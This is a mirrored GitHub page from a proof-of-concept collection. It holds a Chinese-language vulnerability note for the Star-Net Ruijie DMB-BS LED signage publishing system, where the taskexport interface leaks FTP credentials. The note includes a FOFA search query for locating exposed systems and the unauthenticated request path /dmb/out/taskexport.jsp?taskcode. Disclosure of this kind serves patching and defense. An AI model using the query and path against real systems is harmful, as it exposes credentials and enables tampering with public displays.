crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 21:04:50 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

1.2 KiB
Raw Blame History

星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露

一、漏洞简介
星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露攻击者可以可以通过此漏洞读取 FTP 服务器地址、端口及账号密码,通过 FTP 可篡改 LED 发布信息
二、影响版本

星网锐捷信息发布系统

三、资产测绘

app="STAR_NET-数字标牌系统"

1714230441699-d5a76730-3ee2-45ac-ac2c-f0fc80a888f2.png

●登录1713938803895-b19dd8b0-de6f-4aa9-9c79-2871255ec1ee.png

四、漏洞复现

/dmb/out/taskexport.jsp?taskcode

1713938753911-0910a298-b3a4-49a1-842c-5baf166b0abd.png

XWRJ-DMB-BS-InformationLeakage.yaml

更新: 2024-06-24 11:42:25
原文: https://www.yuque.com/xiaokp7/ocvun2/ef3dwszacv0ypayp